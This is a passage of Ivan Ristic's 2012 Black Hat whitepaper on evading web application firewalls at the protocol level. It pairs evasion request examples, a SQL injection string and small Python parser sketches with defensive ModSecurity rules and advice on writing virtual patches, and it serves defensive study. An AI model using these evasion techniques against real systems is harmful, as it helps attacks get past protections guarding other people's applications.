BH US 12 Ristic Protocol Level WP

Protocol-Level Evasion of Web Application Firewalls

Version: 1.0 (10 July 2012)


Author: Ivan Ristic

Web application firewalls (WAFs) are security tools designed to provide an independent security
layer for web applications. Implemented as appliances, network sniffers, proxies, or web server
modules, they analyze inbound and outbound data to detect and protect against attacks.

At some point in the last couple of years, WAFs became an accepted security best practice. It
took a lot of time and a lot of struggle, and it would not have happened had the PCI Council not
given WAFs a serious push by making them an integral part of PCI compliance [1]. (I could
almost hear a collective sigh of relief from the WAF vendors; their daily lives suddenly became
easier.) Today, WAFs are widely deployed, although the doubts and controversies remain.

Anyhow, I am not here today to talk about the slow adoption of WAFs. That would take too long
and would distract us from more interesting things. I want to talk about something else: how
good are WAFs at doing their job? More specifically, I want to focus on protocol-level evasion,
which is a fairly low-level aspect of WAF operation and one that is often forgotten.

My point is that these things need to be talked about. Because of the various realities of their
business existence, vendors cannot and will not build great security products alone. It can only
be done in effective collaboration with the users, with them building the products and us keeping
them in check. Unless we make it clear that technical quality is important to us, we're not going
to get it.

Thus, my main reason for being here today is my desire to expose the inner workings of WAFs,
increase transparency and work to improve the effectiveness of WAFs. It all comes down to the
following question:

Are WAFs Any Good?


When I am asked this question, I usually reframe the discussion away from "are WAFs any
good?" to "are the currently available implementations any good?" I prefer to think about what is
possible, rather than about what we have today. Even then, there is no easy answer. I think
the answer can be a yes, but WAFs are a complex technology and to use them you need to
have someone knowledgeable in the driver's seat. Anecdotal evidence tells us that, in most
deployments, problems arise from mismatched expectations, lack of expertise and time, and
usability issues.

It does not help that, despite the continuous vocal opposition to WAFs, security researchers and
penetration testers aren't actually ensuring that the technical weaknesses of WAFs are discussed
properly. Ask yourselves this: when did you last see a good technical comparison of WAFs? Or,
rather, have you ever seen one? The answer is a clear no. The concept behind WAFs is sound,
but we still have a way to go.

In terms of protection, we should accept WAFs for what they really are — a method of
increasing the cost of attacks, but not necessarily something that can repel everyone. I have a
feeling that WAFs could be much more useful if more organizations stopped treating them as
specialized IPS tools for HTTP. There are many other use cases with tremendous potential, for
example application security monitoring (ASM), attack surface reduction, application hardening,
policy enforcement, and so on. Unfortunately, application security budgets are not very big, and
these techniques require a significant time investment.

IDS, IPS, and Deep-Inspection Firewalls

Virtually all of the information here applies not only to WAFs, but to IDS and IPS tools, and
deep-inspection firewalls. In fact, bypassing network-centric security tools is bound to be easier
because, in general, they perform less HTTP processing (parsing) than WAFs.

WAF Implementation Challenges


The most important selling point of a WAF is that it fully understands and processes HTTP, as
well as the many sub-protocols and data formats carried over HTTP. After all, you could deploy
an IPS tool to inspect the traffic byte streams, but today's web vulnerabilities are too complex for
lower-level devices to handle.

The job is not trivial. As any IDS vendor will tell you, interpreting traffic passively is fraught with
traps and problems. WAFs have the luxury of having more CPU cycles available to perform
traffic parsing and analysis, but the smarter you get in your parsing, the easier it is for the
complexity to overwhelm you and you become a victim of evasion.

On one end is simple byte-stream inspection, where you treat a TCP stream or some major
part of an HTTP transaction as a series of bytes, and try to match your signatures against
that. This approach is appealing because it can handle any data (no protocol parsing is
necessary), but it can be easily evaded. For example, think about the support for header
folding in HTTP: the mechanism can be used to split a single header value across several
lines. Further, simple inspection does not enable advanced features.
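Header folding makes the problem concrete. The sketch below, with a hypothetical signature and header name, shows how a line-oriented byte matcher misses a folded header that a protocol-aware unfolding step recovers:

```python
import re

# Hypothetical byte-stream signature for a SQL injection fragment.
signature = re.compile(rb"UNION\s+SELECT")

# The same header value, sent plainly and split across two lines
# using header folding (a continuation line begins with SP or HT).
plain  = b"X-Data: 1 UNION SELECT pass FROM users\r\n"
folded = b"X-Data: 1 UNION\r\n SELECT pass FROM users\r\n"

def naive_match(raw):
    # Line-oriented byte inspection with no protocol awareness.
    return any(signature.search(line) for line in raw.split(b"\r\n"))

def unfold(raw):
    # Protocol-aware step: merge continuation lines back into one value.
    return re.sub(rb"\r\n[ \t]+", b" ", raw)

print(naive_match(plain))           # the plain form is caught
print(naive_match(folded))          # the folded form slips through
print(naive_match(unfold(folded)))  # unfolding restores detection
```
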

On the other end is smart in-context inspection, with full protocol parsing and evaluation of data
in the appropriate context. For example, you know that a piece of data is a value of a request
header, and you treat the data as such. This approach is very powerful, but very difficult to
implement successfully because you have to deal with dozens of different backend
implementations and their parsing quirks.

I experienced this problem first hand in the years of working on ModSecurity [9], which is a
popular open source WAF. I started ModSecurity in 2002, and worked on it until 2009, maybe
2010. I had always wanted ModSecurity to be very smart, but, every time I pushed it into that
direction, I discovered that being smart is not always the best approach. What I eventually
realised is that you need to be smart and dumb at the same time.

During my research of this topic, I used ModSecurity and ModSecurity Core Rule Set [10] (a
separate distribution of security rules) to test against. In the process, I discovered two previously
unaddressed issues. They were disclosed to Trustwave in June 2012 [2] and consequently fixed
in ModSecurity 2.6.6 and ModSecurity Core Rule Set 2.2.5. The details of the problems will
follow later in the text.

Impedance Mismatch
There's a term for what I am talking about; it's called impedance mismatch [3]. This is a very
important concept for security tools: you're interpreting the stream of data in one way, but
there's a danger that whatever you are protecting is interpreting the same data differently.

I'll give you one example: years ago I was testing a passive WAF. Back then, passive WAFs
were easy to sell, because people wanted security but without risk of downtime. To configure
this particular WAF to monitor a web site, you had to put it on a network somewhere, where it
could see all traffic, and input a web site's hostname.

Deciding whether a connection should be inspected is a decision point. Decision points are
critical for WAFs; every time they make a decision there's a risk that they'll do the wrong thing.
And it's a very tricky problem, too, because if you make a mistake you become completely blind
to attacks.

I succeeded in bypassing this device on my first attempt, and I did it by adding a single
character to the request payload. Here's the request I sent:

GET /index.php?p=SOME_SQLI_PAYLOAD_HERE HTTP/1.0
Host: www.example.com.
User-Agent: Whatever/1.0

To make this request bypass the WAF, I added a single dot character to the end of the Host
request header. Yes, really. Apparently, the WAF developers had not considered the various
alternative representations of the hostname — they implemented only what worked for them.

There's a bunch of other things I could have tried here. Omitting the Host request header or
using a non-existing hostname often works. A WAF may be configured to select sites and
policies based on the hostname, whereas the backend server may simply always fall back to the
default site when the hostname is not recognized. In addition, for performance reasons WAFs
may stop monitoring a connection after determining that the first request is not intended for the
site, but you can often continue to submit further requests (with the correct hostname) when
persistent connections are enabled.
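A probe for this class of decision point just enumerates hostname representations. A minimal sketch, with www.example.com standing in as a placeholder target:

```python
# Sketch of hostname-variation probes against site-selection logic;
# www.example.com is a placeholder target, not a specific test host.
def host_variations(hostname):
    """Return (description, header lines) pairs that a backend may map
    to the same site while a WAF keyed to an exact match may not."""
    return [
        ("exact",        [f"Host: {hostname}"]),
        ("trailing dot", [f"Host: {hostname}."]),
        ("case change",  [f"Host: {hostname.upper()}"]),
        ("no Host",      []),
        ("unknown host", ["Host: nonexistent.invalid"]),
    ]

variants = dict(host_variations("www.example.com"))
for description, lines in variants.items():
    print(description, lines)
```
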

The main lesson here is that security products must be designed to use their most restrictive
policy by default, and relax policy only when there is a good reason to do so. In other words,
they must be designed to fail securely.
Exploitation of Decision Points for Universal Evasion
I want to go back to decision points because it's a very important concept to understand. A
decision point occurs at any place in the code where the implementation logic has to branch. In
the previous evasion example, the key decision point occurred when the WAF examined the
hostname and determined that it did not match the site that is being protected.

Any decision point can be potentially turned into an evasion point, by performing the following
steps:

1. Pick a target technology stack
2. Identify the decision points involved in the processing of some data
3. Generate a number of request variations, each differing in some small detail and
designed to exercise an individual decision point
4. Note which variations are ignored
5. Try the same variations when a WAF is present, without any attack payload (you want to
see if the WAF will pick up the anomaly itself, and not any other payload you might have
in the request)
6. If the variations are not detected and blocked outright, attempt to develop an exploit

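Steps 3 through 6 amount to differential testing. A minimal sketch, where send_to_backend and send_via_waf are hypothetical helpers that submit a variation and return an HTTP status code:

```python
# Keep variations that the backend accepts but the WAF (tested without
# an attack payload) does not flag; these are evasion candidates.
def find_evasion_candidates(variations, send_to_backend, send_via_waf):
    candidates = []
    for variation in variations:
        if send_to_backend(variation) != 200:
            continue  # backend rejects or ignores the variation
        if send_via_waf(variation) != 200:
            continue  # the WAF notices the anomaly itself
        candidates.append(variation)  # worth developing into an exploit
    return candidates

# Stub responders standing in for live servers:
backend = lambda v: 200 if v in ("a", "b") else 400
waf     = lambda v: 403 if v == "b" else 200
print(find_evasion_candidates(["a", "b", "c"], backend, waf))  # ['a']
```
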
By now you have probably figured out what the rest of this talk is going to be like. We're going to
slice and dice through HTTP looking for important decision points, and I am going to show you
how bad decisions can be used to evade detection for any attack payload. I won't even try to
enumerate all possible techniques, in part because doing so would make for a terribly long and
boring talk. I am focusing only on the principles, and a few selected interesting approaches that
worked reliably.

However, as part of this talk I am releasing a catalog of evasion techniques, and there the goal
is to enumerate everything. In addition, I am also releasing a number of tests along with a
simple tool that you can use to test these things yourselves. All these things are now on GitHub
[4], so feel free to try them out. I'd be delighted if some of you would find the topic so interesting
that you'll be compelled to join the project and contribute refinements, new tests and tools.

Virtual Patching
Virtual patching is the process of addressing security issues in web applications without making
changes to application code. For various reasons, organizations are often unable to address
security issues in a timely manner (e.g., no development resources, not allowed to modify the
source code, etc). In such situations, virtual patching can mitigate the problem by reducing the
window of opportunity for the attack. Further, because the application itself is left alone, virtual
patching can be used even with closed-source applications.

Virtual patching is probably one of the most loved WAF features because of its narrow focus
(breakage potential is limited) and potential high value (vulnerability is mitigated).

However, the same qualities that make virtual patches so useful (precision, and the ability to
control exactly what is allowed through) also make them prone to bypasses. A large number of
decision points is required to deliver that precision, but the more decision points there are, the
more opportunities for evasion there are.

Before we proceed further, I want to be clear about what I mean when I say virtual patching,
because there isn't only one definition of it. Some people have low expectations of this
technique; they might say that they're using virtual patching even when they merely enable
blocking in the part of the application that is vulnerable (perhaps deploying in monitoring-only
mode elsewhere), or increase the aggressiveness of their blocking in the vulnerable spot. These
approaches, although no doubt useful, are not what I have in mind.

My definition is much stricter. For me, a virtual patch is what you produce when you spend the
time to understand the part of the application that is vulnerable and the time to understand the
flaw, and in the end produce a patch in which you accept only data that you know to be valid.

This approach is also known as whitelisting, or a positive security model. It is powerful because
you don't need to know what attacks look like; you only need to know what good data looks like.
The catch is that good virtual patches require a great deal of knowledge. They are tricky to
implement correctly, as you shall soon see.

Broadly speaking, virtual patches generally consist of two steps:

1. Activation, where you examine the request path to determine whether the patch should be
enforced. The site is vulnerable in only one location, so you need to ensure your patch
runs only there and does not interfere with the rest of your site.
2. Inspection, where you examine the vulnerable parameter(s) to determine whether they are
safe to allow through.

Looking at these two steps, ask yourselves this:

● What if I manipulate the path so that the patch is not activated, but the request is still
delivered to the correct location in the backend?
● What if I manipulate the parameters so that my attack payload is missed by the WAF, but
the request is still processed normally by the backend?

Let's take a look.

Attacking Patch Activation


To activate a patch, the WAF needs to examine the request path and match it against the path
of the virtual patch. We are assuming that the hostname/site selection was successful. We're
going to use Apache and ModSecurity for examples, but the approach is the same no matter
which WAF you're dealing with.

Let's suppose that we have an application vulnerable to SQL injection. Normally, you would
exploit it by sending something like this:

/myapp/admin.php?userid=1PAYLOAD

To address this problem I might write a patch like this:

<Location /myapp/admin.php>
    # Allow only numbers in userid
    SecRule ARGS:userid "!^\d+$"
</Location>

ModSecurity is very good at giving you near-complete control over what is and isn't allowed. Not
all WAFs are able to do this. Those that have fewer controls might be easier to evade. Those
that have more controls are better in the hands of an expert, but also offer more room for
mistakes.

Warming up with PATH_INFO and Path Parameters


Surprisingly, some WAFs are still not familiar with the concept of extra path contents
(PATH_INFO). Against them, the following simple path change works:

/myapp/admin.php/xyz?userid=1PAYLOAD

Simply by appending some random content to the path you completely evade the virtual patch.
The attack does not work against the <Location> tag in Apache, because the value supplied
there is treated as a prefix.

Not all web servers support PATH_INFO, or at least not in all situations. In such cases, a similar
feature called path parameters (there's only a vague mention of it in section 3.3 of the URI RFC)
may come in handy. Consider the following URL:

/myapp/admin.php;param=value?userid=1PAYLOAD

In both cases the operation of this evasion technique is the same: we alter the path so that it is
not matched correctly by the WAF, but still works in the backend.
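Both techniques can be generated mechanically. A small sketch, using the example path and payload placeholder from the text:

```python
# Derive PATH_INFO and path-parameter variants of a request line.
def path_variants(path, query):
    prefix, _, last = path.rpartition("/")
    return [
        f"{path}?{query}",              # original
        f"{path}/xyz?{query}",          # PATH_INFO suffix
        f"{path};param=value?{query}",  # parameter on the last segment
        f"{prefix};/{last}?{query}",    # bare semicolon on an earlier segment
    ]

for url in path_variants("/myapp/admin.php", "userid=1PAYLOAD"):
    print(url)
```
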

Attacking Self-Contained ModSecurity Rules


ModSecurity patches are sometimes written to be self-contained, which makes them more
useful. You simply include the virtual patches at the site level, and don't have to worry about
them messing up your Apache configuration. Take a look at the following example, which is
representative of many real-life rules:

SecRule REQUEST_FILENAME "@streq /myapp/admin.php" \
    "chain,phase:2,deny"
SecRule ARGS:userid "!^[a-zA-Z0-9]+$"

This is what is known in ModSecurity as a chain of rules. The first rule will look at the path to
determine if we're in the right place. The second rule, which runs only if the first rule was
successful, will perform parameter inspection.

On the surface, the above chain works as expected, but, sadly, it suffers from more than one
problem. First, it is vulnerable to the PATH_INFO attack. Append anything to the path, and the
rule is bypassed. The mistake here is in using the @streq operator, which requires a complete
match.

Second, the above rule does not anticipate the use of any path obfuscation techniques. For
example, consider the following functionally equivalent paths:

/myapp//admin.php
/myapp/./admin.php
/myapp/xyz/../admin.php

When the <Location> tag is used, Apache handles path normalization and thus defeats the
above attacks. But with self-contained ModSecurity rules, rule writers are on their own. There's
a great feature in ModSecurity for this, called transformation pipelines [5]. The idea is that,
before a matching operation is attempted, input data is converted from its raw representation
into something that, ideally, abstracts away all the evasion issues.

In this case, all we need to do is apply the normalizePath transformation function to take care of
path evasion issues for us:

SecRule REQUEST_FILENAME "@beginsWith /myapp/admin.php" \
    "chain,phase:2,t:none,t:normalizePath,deny"
SecRule ARGS:userid "!^[a-zA-Z0-9]+$"

In addition, the updated version of the rule uses @beginsWith, which is safer against
PATH_INFO attacks (@contains is a good choice too).

Variations in Underlying Web Server Platforms


Let's complicate things further. Imagine that your Apache installation is actually a reverse proxy
designed to protect applications running on a Windows-based web server. Several further
evasion techniques come to mind, for example these:

/myapp\admin.php
/myapp\ADMIN.PHP

These will actually work, against either the Apache <Location> approach or the self-contained
ModSecurity rule used above. (You may not necessarily be able to execute these attacks from a
browser, because browsers sometimes normalize the request URI and in the process convert
backslashes to forward slashes.) The first attack will work because Windows accepts the
backslash character as a path separator. The second will work because the backend filesystem
on Windows is not case sensitive. The latter attack is not Windows-specific; it will work on any
filesystem that is not case sensitive (e.g., HFS).

To counter these new evasion techniques in Apache, we have to ditch the comfort of the default
<Location> tag and use the more powerful, and more difficult to use, pattern-based location
matching. After some trial and error, this is what I came up with:
<Location ~ (?i)^[\x5c/]+myapp[\x5c/]+admin\.php>
    SecRule ARGS:userid "!^\d+$"
</Location>

To deal with the problem, we have to:

1. Resort to using the special regex-based <Location> syntax
2. Escape all meta-characters in the path (e.g., \.)
3. Activate case-insensitive pattern matching with (?i)
4. Treat backslashes as path separators
5. Manually handle multiple consecutive path separators

Frankly, I don't have much faith in the solution. It may or may not work, but it's too convoluted
for my liking. Something that complicated is difficult to secure reliably.

ModSecurity has a much better way to handle these attacks, whereby in the transformation
pipeline instead of normalizePath, which was designed for Unix platforms, you use
normalizePathWin, which was designed for Windows platforms. In addition, we are going to
convert the path to lowercase:

SecRule REQUEST_FILENAME "@beginsWith /myapp/admin.php" \
    "chain,phase:2,t:none,t:lowercase,t:normalizePathWin,deny"
SecRule ARGS:userid "!^[0-9]+$"

The first transformation will convert the input to lowercase. The second will normalize the path,
first converting backslashes to forward slashes and then performing the same normalization as
normalizePath.
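The effect of the two transformations can be approximated in a few lines. In the sketch below, posixpath.normpath stands in for the normalization step; it is not ModSecurity's implementation, but it handles the same cases:

```python
import posixpath

# Approximate t:lowercase followed by t:normalizePathWin: lowercase,
# convert backslashes, then collapse duplicate separators and resolve
# ./ and ../ segments.
def normalize_path_win(path):
    return posixpath.normpath(path.lower().replace("\\", "/"))

for evasion in (r"/myapp\ADMIN.PHP",
                "/myapp//admin.php",
                "/myapp/./admin.php",
                "/myapp/xyz/../admin.php"):
    print(normalize_path_win(evasion))  # all print /myapp/admin.php
```
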

Path Parameters Again


Path parameters are actually path segment parameters, which means that any segment of a
path can have them. The following works against Tomcat:

/myapp;param=value/admin.php?userid=1PAYLOAD

And even a single semicolon is enough to break up the path:

/myapp;/admin.php?userid=1PAYLOAD

Let's try to counter this evasion in Apache:

<Location ~ (?i)^[\x5c/]+myapp(;[^\x5c/]*)?[\x5c/]+admin\.php(;[^\x5c/]*)?>
    SecRule ARGS:userid "!^\d+$"
</Location>

This seems to work but can we reasonably expect anyone to write and maintain such rules?

ModSecurity does not currently have a transformation function that removes path segment
parameters, which would be the ideal approach to keep virtual patches relatively simple. In the
absence of such a transformation function, the possible defenses are to use the above pattern
with an @rx operator, or to detect the presence of invalid path segment parameters (which may
not be easy, because there are legitimate uses for them, such as session management) and
reject the transaction on that basis alone.
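For illustration, such a hypothetical transformation is simple to sketch; this function does not exist in ModSecurity, it only shows what the missing piece might do:

```python
# Remove everything from ';' to the end of each path segment.
def strip_path_parameters(path):
    return "/".join(segment.split(";", 1)[0]
                    for segment in path.split("/"))

print(strip_path_parameters("/myapp;param=value/admin.php"))  # /myapp/admin.php
print(strip_path_parameters("/myapp;/admin.php"))             # /myapp/admin.php
```
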

Short Names for Apache Running on Windows


The Windows operating system supports long filenames today, but this feature was introduced
halfway through its evolution. To support legacy applications, even today, every file with a long
name also has a short (8.3) name associated with it; for example, a file named longfilename.php
will typically also be accessible as LONGFI~1.PHP. These short names are great for evasion,
because they are like a passage to your application that is hidden from the WAF but known to
the web server.

This evasion technique cannot be used against IIS, but it works well against Apache when it is
running on Windows, presumably because Apache does not implement any Windows-specific
countermeasures. Thanks to Johannes Dahse, who pointed this out to me when he was
reviewing this document.

Further Problems with Older IIS Versions


The point at which one comes close to admitting defeat, at least when it comes to performing
virtual patching in an elegant way, is when IIS 5.1 gets involved. The rich path handling and
normalization features of IIS 5.1 allow many other evasion techniques:

● Overlong 2- or 3-byte UTF-8 sequences representing either / (%c0%af and %e0%80%af)
or \ (%c1%9c and %e0%81%9c)
● In fact, any overlong UTF-8 character facilitates evasion
● Best-fit mapping of UTF-8; for example, U+0107 becomes c
● Best-fit mapping of %u-encoded characters (does not work against Apache, which does
not support %u encoding)
● Full-width mapping of UTF-8 encoded characters; for example, U+FF0F becomes /
● Full-width mapping of %u encoding (does not work against Apache, which does not
support %u encoding)
● Terminate the URL path using %00 (does not work against Apache, which always
responds with 404)

Against both IIS 5 and IIS 6:

● Encode slashes using %u encoding (does not work against Apache, which does not
support %u encoding)
Against some very old IIS installations:

● Bypass patch activation using Alternate Data Streams (e.g., append ::$DATA to the
path)
Fortunately, most of these issues were addressed in newer IIS releases (IIS7+). Unfortunately,
WAFs are often deployed to protect legacy systems that no one knows how to upgrade, so
chances are the problems are still rife. A good WAF should be able to handle all of the above
problems within its default protection rules.
Attacking Parameter Verification
Even after a patch is activated, it still needs to apply correct checks to the correct parameters. In
my experience, this is generally easy to bypass with one of the techniques presented in this
section.

Multiple parameters and parameter name case sensitivity


The simplest evasion technique of this type is to submit more than one parameter: some
containing innocent data, some containing attack payloads. A badly written defense mechanism
may screen only the first or the last parameter, missing the others.

For example:

/myapp/admin.php?userid=1&userid=1PAYLOAD

A similar approach is to vary the case of the parameter name, in the expectation that some
mechanisms implement case-sensitive name matching while the backend, on some platforms,
treats names case-insensitively.
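Both tricks reduce to the same validation mistake. A sketch (case-insensitive matching here models platforms such as ASP that treat parameter names case-insensitively):

```python
from urllib.parse import parse_qsl

query = "userid=1&userid=1PAYLOAD&UserId=2PAYLOAD"
pairs = parse_qsl(query)

# Naive screening: validate only the first exact-name occurrence.
first_value = next(v for k, v in pairs if k == "userid")

# Thorough screening: validate every occurrence of the name,
# compared case-insensitively.
bad_values = [v for k, v in pairs
              if k.lower() == "userid" and not v.isdigit()]

print(first_value)  # '1' -- the naive check passes
print(bad_values)   # both payloads are caught
```
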

PHP's treatment of cookies as parameters


In PHP, configuration can dictate that request parameters are extracted not only from the query
string and request body, but also from cookies. This used to be the default setting, actually, but
it changed at some point (probably around PHP 5.3.0).

Consider the following code:

$_REQUEST['userid']

and the following request:

GET /myapp/admin.php
Cookie: userid=1PAYLOAD

With a vulnerable PHP application, the above will bypass any WAF that does not treat cookies
as parameters. Further, even though the cookie specification defines cookie values as opaque,
PHP will URL-decode the supplied values.

HTTP Parameter Pollution


HTTP Parameter Pollution (HPP), documented by Luca Carettoni and Stefano di Paola in 2009
[6], exploits the fact that there is no standard way to handle multiple occurrences of same-name
parameters. Some platforms will process the first value, some the last, and some will, depending
on the code, even combine multiple parameter values into a single string. This is a problem for
WAFs because they see two separate parameters, whereas the application sees only one. But
which one, and what does it contain?

Assuming the following request with two same-name parameters:

/myapp/admin.php?userid=1&userid=2
the following table demonstrates the behavior of major web application platforms (much more
information is available in Luca's and Stefano's presentation [6]):

Technology   Behavior           Example
ASP          Concatenate        userid=1,2
PHP          Last occurrence    userid=2
Java         First occurrence   userid=1

This technique is especially useful for SQL injection because the comma that is the byproduct of
concatenation in the case of ASP applications can be arranged to work as part of SQL.

Because same-name parameters are often used by applications (selecting more than one
option in a list will produce them), HPP is difficult to detect without some knowledge of the
application.

To counter HPP, virtual patches should be written to restrict the number of same-name
parameters submitted to the application (there's an example of this later in the text). Assuming
individual parameter values are properly validated, it is difficult to use HPP for protocol-level
evasion. It's far more useful for the evasion of the signatures that attempt to detect specific
issues (e.g., SQL injection).
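The three platform behaviors are easy to reproduce; a small sketch:

```python
from urllib.parse import parse_qsl

# Interpret the same query as each platform class would.
values = [v for k, v in parse_qsl("userid=1&userid=2") if k == "userid"]

asp_style  = ",".join(values)  # concatenation
php_style  = values[-1]        # last occurrence wins
java_style = values[0]         # first occurrence wins

print(asp_style, php_style, java_style)  # 1,2 2 1
```
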

Tricks with Parameter Names


Speaking of tricks, my favourite one is the transformation of parameter names performed by
PHP. This problem was documented long ago in the ModSecurity Reference Manual, and I
wrote about it again on my blog in 2007 [8]. If you submit parameter names with funny
characters, PHP will tidy them up for you. For example, whitespace at the edges is removed,
and whitespace and a few other characters inside parameter names are converted to
underscores. This is very handy for evasion: simply put a + character in front of the parameter
name and you're done.

/myapp/admin.php?+userid=1PAYLOAD
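A rough model of the cleanup (an approximation, not PHP's exact code; note that '+' in a query string is itself URL encoding for a space, which PHP then trims):

```python
import re

# Approximate PHP's parameter-name cleanup: decode '+' to space,
# trim whitespace at the edges, and convert spaces and dots inside
# the name to underscores.
def php_name(raw_name):
    name = raw_name.replace("+", " ").strip()
    return re.sub(r"[ .]", "_", name)

print(php_name("+userid"))   # userid -- the patch no longer sees '+userid'
print(php_name("user.id"))   # user_id
```
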

This problem highlights an often-used (and wrong) approach to virtual patching, in which you
inspect only parts of the request. For example, if you remember our patch from earlier, it had
this rule:

SecRule ARGS:userid "!^\d+$"

Clearly, if the WAF does not see the userid parameter, it won't do anything. To address this
problem, virtual patches should be designed to reject any unknown parameters.
Invalid URL-Encoding
There's an interesting behavior on the ASP platform (and potentially elsewhere) that applies
here: if you supply invalid URL encoding, ASP will remove the % character from the string.

/myapp/admin.php?%userid=1PAYLOAD

This reminds me of a very old problem from the time when many web applications were still
developed in C, and had their own custom URL decoders. Some applications would not check
the range of characters used in the encoding, and would proceed to decode payloads that are
not hexadecimal numbers. For example, normally you would encode i as %69:

/myapp/admin.php?user%69d=1PAYLOAD

But with an incorrectly implemented decode function, %}9 might work just the same:

/myapp/admin.php?user%}9d=1PAYLOAD
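One plausible broken decoder of this kind converts hex digits with bare character arithmetic and no range check, so an out-of-range character wraps into a valid byte. A sketch of such a decoder (an illustration of the class of bug, not any specific application's code):

```python
# A deliberately broken C-style URL decoder: "hex digits" are computed
# with character arithmetic and never validated.
def careless_hexval(c):
    if c >= "a":
        return ord(c) - ord("a") + 10
    if c >= "A":
        return ord(c) - ord("A") + 10
    return ord(c) - ord("0")

def careless_decode(s):
    out, i = [], 0
    while i < len(s):
        if s[i] == "%" and i + 2 < len(s):
            byte = (careless_hexval(s[i + 1]) << 4) | careless_hexval(s[i + 2])
            out.append(chr(byte & 0xFF))  # out-of-range values wrap here
            i += 3
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

# '}' is 0x7D; treated as a hex digit it yields 38, and
# (38 << 4 | 9) & 0xFF == 0x69 == 'i', so %}9 decodes like %69.
print(careless_decode("user%}9d"))  # userid
print(careless_decode("user%69d"))  # userid
```
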

Writing Good Virtual Patches


Most tricks targeting parameter verification can be mitigated with a few simple rules:

1. Enumerate all parameters
2. For each parameter, determine how many times it can appear in the request
3. For each parameter, check that the value conforms to the desired format
4. Reject requests that contain unknown parameters
5. Reject requests that use invalid encoding (not as part of the patch itself, but as part of
the global WAF configuration)

Here's an example of the above, using ModSecurity:

<Location /index.php>
    SecDefaultAction phase:2,t:none,log,deny

    # Validate parameter names
    SecRule ARGS_NAMES "!^(articleid)$" \
        "msg:'Unknown parameter: %{MATCHED_VAR_NAME}'"

    # Expecting articleid only once
    SecRule &ARGS:articleid "!@eq 1" \
        "msg:'Parameter articleid seen more than once'"

    # Validate parameter articleid
    SecRule ARGS:articleid "!^[0-9]{1,10}$" \
        "msg:'Invalid parameter articleid'"
</Location>
Attacking Parameter Parsing
In requests that use the GET method, you know that any supplied parameters are in the
application/x-www-form-urlencoded format. When the POST method is used, however, you first
have to correctly identify the type of encoding used. As it turns out, this is a nice opportunity
for evasion.

If you cannot identify the encoding, the best you can do is treat the request body as a stream of
bytes, and inspect that. That is actually an excellent second line of defense, but it does not work
very well in all cases, virtual patching in particular.

Omitting Content-Type or supplying an arbitrary value


First of all, you can try to confuse WAFs by not providing a Content-Type header. That may
cause them to skip processing the body, whereas the backend application may proceed
because its processing is hard-coded.

The WAF may be designed to reject transactions that do not have a Content-Type header set,
in which case you may attempt to submit some random value that does not match the type of
the payload. With such a Content-Type the transaction will be valid, strictly speaking, yet the
WAF will not be able to process it correctly. The backend application, with its hard-coded
functionality, will happily handle the data.

In the most difficult case, that of a WAF rejecting unknown MIME types, the best approach is to
submit multipart/form-data in the Content-Type header, along with a request body that can be
parsed as both urlencoded and multipart format. The former will be designed for the application
to consume, and the latter for the WAF.
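A hypothetical sketch of such a dual-format body, using Python's standard library to stand in for the two parsers (the boundary value, part name, and payload are made up for illustration):

```python
from urllib.parse import parse_qs

boundary = "0000"

# One body, two interpretations. The multipart view (what the WAF sees)
# contains a single benign part; the urlencoded view (what the backend
# sees, if it parses the body as a query string) contains the payload.
body = (
    "--0000\r\n"
    'Content-Disposition: form-data; name="a"\r\n'
    "\r\n"
    "&articleid=1%27+OR+1%3D1&\r\n"
    "--0000--\r\n"
)

# Urlencoded view: splitting on '&' and '=' surfaces an 'articleid' value.
urlencoded_view = parse_qs(body)
print(urlencoded_view["articleid"])  # ["1' OR 1=1"]

# Multipart view: splitting on the boundary yields one part named 'a'.
multipart_part = body.split("--" + boundary)[1]
print('name="a"' in multipart_part)  # True
```

The payload is wrapped in '&' characters so that an urlencoded parser isolates it cleanly from the surrounding multipart syntax.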

Attacks Against Format Detection

Not all applications hard-code request body processing, but some are pretty lax in determining
the correct encoding. This became apparent to me when I was reading the source code of
Apache Commons FileUpload [11], a very popular Java library that handles multipart/form-data
parsing. When detecting multipart/form-data, it will examine the Content-Type request header
and treat any MIME type that begins with multipart/ as multipart/form-data. Hmmm, I
wonder what we can do with that?

One approach might be to send multipart/whatever as the MIME type, with the body in
multipart/form-data format. The application will conclude that the request body does indeed
contain multipart/form-data and process it accordingly. But what will the WAF do?
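The detection logic described above amounts to a simple prefix check. A Python sketch of that behavior (modeled on the description, not FileUpload's actual code):

```python
def is_multipart(content_type):
    # Lax detection modeled on the behavior described above: any MIME
    # type that merely begins with "multipart/" is accepted as
    # multipart/form-data.
    if content_type is None:
        return False
    return content_type.lower().startswith("multipart/")

print(is_multipart("multipart/form-data; boundary=0000"))  # True
print(is_multipart("multipart/whatever; boundary=0000"))   # True
print(is_multipart("application/x-www-form-urlencoded"))   # False
```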

If you're lucky, your WAF will block upon encountering an invalid or unknown MIME type. If it
does not, anything you put in the request body will potentially evade inspection.

Apache Commons FileUpload is not the only library with lax MIME type detection. A quick
inspection shows that other popular libraries have equally bad or worse implementations.

Evading ModSecurity
ModSecurity ships with only a small number of rules in its default configuration. The
purpose of these rules is to check that processing has been performed correctly. These rules do
not check that the supplied MIME type is valid, or known, so using multipart/whatever
against ModSecurity will work when it is used to protect applications relying on the FileUpload
library.

If you are using ModSecurity, but not the separate Core Rule Set package (see below), you
need to add custom rules to your configuration to ensure only known MIME types are allowed
through. ModSecurity does not perform bytestream inspection of unknown content, which
means that it will pass through whatever it does not recognize.

It is difficult for WAFs to be secure by default, because different applications use different
MIME types. If you start with a strict configuration, usability suffers; if you start with a lax
configuration, security suffers. WAFs can't win here.

Evading ModSecurity Core Rule Set

ModSecurity Core Rule Set (CRS), distributed separately from ModSecurity, is stricter — it
allows only requests using known MIME types. However, when I examined the implementation,
I found that it was flawed. This is not the same rule, but a rule that emulates the approach:

SecRule REQUEST_CONTENT_TYPE "!@within \
    application/x-www-form-urlencoded multipart/form-data"

The @within operator performs a substring match, which means that any substring of the
above value would pass the check, even a single character. So now we know that we can bypass
this control using invalid MIME types, which may be useful.

One such invalid MIME type is very useful in combination with Apache Commons FileUpload. If
you recall, its check is lax. If we supply multipart/ as the MIME type, the library will accept that
as multipart/form-data. At the same time, ModSecurity will not know what to do with the payload,
and will allow it through without any processing.
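The two lax checks line up neatly. A sketch in Python, assuming the @within semantics and the FileUpload prefix check described above:

```python
ALLOWED = "application/x-www-form-urlencoded multipart/form-data"

def passes_crs_check(mime_type):
    # @within matches when the inspected value is a substring of the
    # parameter, so any fragment of the allowed string slips through.
    return mime_type in ALLOWED

def accepted_by_fileupload(mime_type):
    # Prefix check modeled on the FileUpload behavior described earlier.
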